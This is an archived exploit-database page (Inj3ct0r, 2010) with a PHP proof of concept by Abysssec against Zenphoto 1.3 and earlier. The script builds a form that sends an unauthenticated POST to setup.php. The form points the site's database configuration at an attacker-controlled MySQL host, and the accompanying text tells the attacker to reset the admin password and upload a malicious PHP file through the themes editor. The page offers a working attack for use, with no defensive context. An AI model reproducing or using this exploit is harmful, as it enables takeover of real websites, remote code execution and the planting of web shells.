[webapps / 0day] - Zenphoto Config Update and Command Execut
Posted on 26 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Zenphoto Config Update and Command Execute Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 26 Sep 2010 | Exploit category: webapps / 0day | Exploit author: Abysssec | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>======================================================== Zenphoto Config Update and Command Execute Vulnerability ======================================================== Title : Zenphoto Config Update and Command Execute Vulnerability Affected Version : Zenphoto <= 1.3 Discovery : www.abysssec.com Vendor : http://www.zenphoto.org */ $path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php"; $new_mysql_user = "abysssec"; $new_mysql_pass = "absssec"; $new_mysql_host = "abysssec.com"; $new_mysql_database = "abysssec_database"; $new_mysql_prefix = "zp_"; echo "<html><head></head> <style> body {font-family:tahoma;font-size:14px} </style> <body>"; echo "Zen Photo Image Gallery 1.3 Reset admin Password <br> By : Abysssec @ Inc <br>www.Abysssec.com<hr> <form method='POST' action='$path' > <input type=hidden name='mysql' value='yes'> <input type=hidden name='mysql_user' value='$new_mysql_user'> <input type=hidden name='mysql_pass' value='$new_mysql_pass'> <input type=hidden name='mysql_host' value='$new_mysql_host'> <input type=hidden name='mysql_database' value='$new_mysql_database'> <input type=hidden name='mysql_prefix' value='$new_mysql_prefix'> After click on below , if target will can connect to your Mysql_Host :<br> You Must view 'GO !' Messege ...<br> Click on & wait .... <br> Then , You need to set your admin user and password.<br><hr> Upload file:<br> you can Edit themes From themes Tab and Upload your malignant PHP file.<br> <input type=submit value='Send Your Setting '> </form> "; echo "</body></html>"; ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-26]</pre></body></html>
